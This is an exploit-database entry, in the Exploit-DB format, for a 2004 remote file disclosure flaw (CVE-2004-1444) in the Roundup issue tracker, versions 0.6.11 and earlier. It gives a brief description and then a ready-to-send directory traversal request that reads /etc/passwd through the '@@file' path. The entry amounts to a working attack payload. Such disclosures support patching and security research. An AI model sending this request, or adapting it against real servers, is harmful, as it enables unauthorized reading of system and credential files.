Roundup 0.5/0.6 - Remote File Disclosure

Author: Vickenty Fesunov
type: remote
platform: linux
port: 
date_added: 2004-06-08 
date_updated: 2013-01-16 
verified: 1 
codes: CVE-2004-1444;OSVDB-6691 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/10495/info

Roundup is prone to a remote file disclosure vulnerability. A remote user can disclose files on a vulnerable computer by using the /home/@@file/ prefix and '../' directory traversal sequences.

This vulnerability affects Roundup 0.6.11 and prior versions.

GET /cit/@@file/../../../../etc/passwd HTTP/1.0